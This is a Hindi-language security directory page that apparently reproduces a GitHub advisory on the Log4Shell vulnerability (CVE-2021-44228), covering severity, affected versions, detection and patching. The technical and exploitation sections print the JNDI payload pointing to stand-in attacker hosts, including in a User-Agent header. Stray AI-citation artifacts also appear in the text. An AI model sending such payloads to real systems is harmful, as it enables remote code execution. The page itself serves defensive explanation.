Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44228 — CVE-2021-44228 | Kitploit
उपकरण/GitHubGitHub/0xblackash/cve-2021-44228
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणखतरा खुफियालर्निंग और शिक्षाचयनित संसाधन
GitHub0xblackash/cve-2021-44228

CVE-2021-44228

CVE-2021-44228

रिपॉजिटरी देखें
22 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2021-44228 — “Log4Shell”

ChatGPT इमेज जून 14, 2026, 02_56_45 PM

गंभीरता CVSS प्रकार तिथि

Apache Log4j 2 में एक गंभीर दूरस्थ कोड निष्पादन भेद्यता, जिसे व्यापक रूप से Log4Shell के नाम से जाना जाता है।


📖 विषय-सूची

  • अवलोकन
  • तकनीकी विवरण
  • गंभीरता और CVSS
  • प्रभावित संस्करण
  • शोषण और प्रभाव
  • वास्तविक दुनिया पर प्रभाव
  • पहचान
  • शमन और सुधार
  • सारांश

🔎 अवलोकन

CVE-2021-44228 :contentReference[oaicite:0]{index=0} संस्करण 2.x (2.15.0 से पहले) में एक गंभीर RCE भेद्यता है, जिसे दिसंबर 2021 में खोजा गया था।

यह अप्रमाणित दूरस्थ हमलावरों को कमजोर सिस्टम पर मनमाना कोड निष्पादित करने की अनुमति देता है, केवल विशेष रूप से तैयार किए गए इनपुट भेजकर जो Log4j द्वारा लॉग किया जाता है। यह दोष दुनिया भर में अनगिनत Java-आधारित अनुप्रयोगों और सेवाओं को प्रभावित करता है।


🧠 तकनीकी विवरण

टूल डाउनलोड करें

यह भेद्यता लॉग की गई स्ट्रिंग्स में Log4j द्वारा JNDI लुकअप को संभालने से उत्पन्न होती है। एक हमलावर लॉग किए गए संदेश में एक दुर्भावनापूर्ण JNDI संसाधन एम्बेड कर सकता है (जैसे LDAP, DNS), जैसे:

root@kitploit:~

${jndi:ldap://attacker.com/a}

Log4j निम्नलिखित कार्य करेगा:

  1. इनपुट से JNDI लुकअप को पार्स करेगा
  2. हमलावर-नियंत्रित सर्वर पर एक दूरस्थ लुकअप करेगा
  3. लुकअप प्रक्रिया के भाग के रूप में दुर्भावनापूर्ण Java कोड लोड करेगा
  4. उस कोड को कमजोर अनुप्रयोग संदर्भ में निष्पादित करेगा

यह हमलावर को प्रभावित सेवाओं पर पूर्ण रिमोट कोड निष्पादन (RCE) प्राप्त करने देता है।


📊 गंभीरता और CVSS

मीट्रिकविवरण
CVSS v3.1 बेस स्कोर10.0 (गंभीर)
आक्रमण वेक्टरनेटवर्क
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता इंटरैक्शनकोई नहीं
प्रमाणीकरणआवश्यक नहीं
प्रभावपूर्ण RCE

चूँकि Log4j का उपयोग अनगिनत लाइब्रेरी और अनुप्रयोगों में होता है, कोई भी सिस्टम जो अविश्वसनीय डेटा लॉग करता है, कमजोर हो सकता है।


📦 प्रभावित संस्करण

Log4j 2 के निम्नलिखित संस्करण कमजोर हैं:

root@kitploit:~

> = 2.0-beta9 और < 2.15.0

इसके अतिरिक्त, 2.15.0 के कुछ कॉन्फ़िगरेशन अभी भी शोषणीय थे, इसलिए 2.16.0 और बाद के संस्करण सुरक्षित आधार रेखा हैं।


🛠 सुधार और समाधान

✅ आधिकारिक निश्चित संस्करण

Log4j 2 संस्करणों में अपडेट करें:

root@kitploit:~

2.17.1 या बाद का

बाद के पैच सुरक्षा में और सुधार करते हैं (जैसे 2.17.2, 2.19.0, आदि)।


🧱 अस्थायी शमन (यदि आप तुरंत पैच नहीं कर सकते)

यदि तत्काल अपग्रेड संभव नहीं है, तो आप:

  • Log4j कॉन्फ़िगरेशन में JNDI लुकअप को अक्षम कर सकते हैं
  • सेट करें:
root@kitploit:~

log4j2.formatMsgNoLookups=true

  • क्लासपाथ से JndiLookup क्लास हटाएँ:
root@kitploit:~

zip -q -d log4j-core.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

ये कदम जब तक आप अपडेट नहीं कर सकते, तब तक जोखिम को कम करने में मदद करते हैं।


🔥 शोषण और प्रभाव

nessus3
nessus4
nessus5

यह भेद्यता शोषण करने में अत्यंत आसान है। हमलावर को केवल एक तैयार स्ट्रिंग भेजनी होती है (जैसे HTTP हैडर, फ़ॉर्म पैरामीटर, चैट संदेश, डेटाबेस फ़ील्ड के माध्यम से) जो एप्लिकेशन द्वारा लॉग की जाती है:

root@kitploit:~

User-Agent: ${jndi:ldap://attacker.example/a}

एक बार लॉग होने के बाद, एप्लिकेशन एक दूरस्थ लुकअप करेगा और उसे हमलावर-नियंत्रित Java कोड निष्पादित करने के लिए मजबूर किया जा सकता है।


🌍 वास्तविक दुनिया पर प्रभाव

Log4Shell का वैश्विक स्तर पर बड़ा प्रभाव पड़ा:

  • अनगिनत सार्वजनिक-सामना करने वाली सेवाएँ तुरंत उजागर हो गईं
  • क्लाउड प्रदाता, गेम सर्वर, एंटरप्राइज़ ऐप्स, IoT, वेब सेवाएँ, API और अन्य प्रभावित हुए
  • पूरे सुरक्षा समुदायों ने कमजोर सिस्टम का पता लगाने और उन्हें पैच करने के लिए जुट गए
  • शोषण व्यापक, स्वचालित और तीव्र था

यह दशकों की सबसे महत्वपूर्ण भेद्यताओं में से एक है।


🧪 पहचान

आप कमजोर सिस्टम का पता लगा सकते हैं:

  • संदिग्ध JNDI पैटर्न (${jndi:) के लिए लॉग स्कैन करके
  • Log4j संस्करणों की जाँच करने वाले भेद्यता स्कैनर का उपयोग करके
  • शोषण प्रयासों के लिए आने वाले ट्रैफ़िक की निगरानी करके
  • JNDI लुकअप समर्थन के लिए क्लासपाथ सामग्री की जाँच करके

📌 सारांश

क्षेत्रमान
CVE IDCVE-2021-44228
उपनामLog4Shell
उत्पादApache Log4j 2
गंभीरतागंभीर (CVSS 10.0)
प्रकारRemote Code Execution
प्रभावपूर्ण सिस्टम समझौता
शोषण-क्षमताअत्यंत आसान
शमन≥ 2.17.1 पर पैच करें

⚠️ अंतिम सलाह

यदि आपका एप्लिकेशन या आपके द्वारा उपयोग की जाने वाली कोई भी लाइब्रेरी Log4j 2.x पर निर्भर है, तो तुरंत एक पैच किए गए संस्करण (≥ 2.17.1) पर अपडेट करें और सत्यापित करें कि JNDI लुकअप अक्षम या हटा दिए गए हैं जहाँ संभव हो।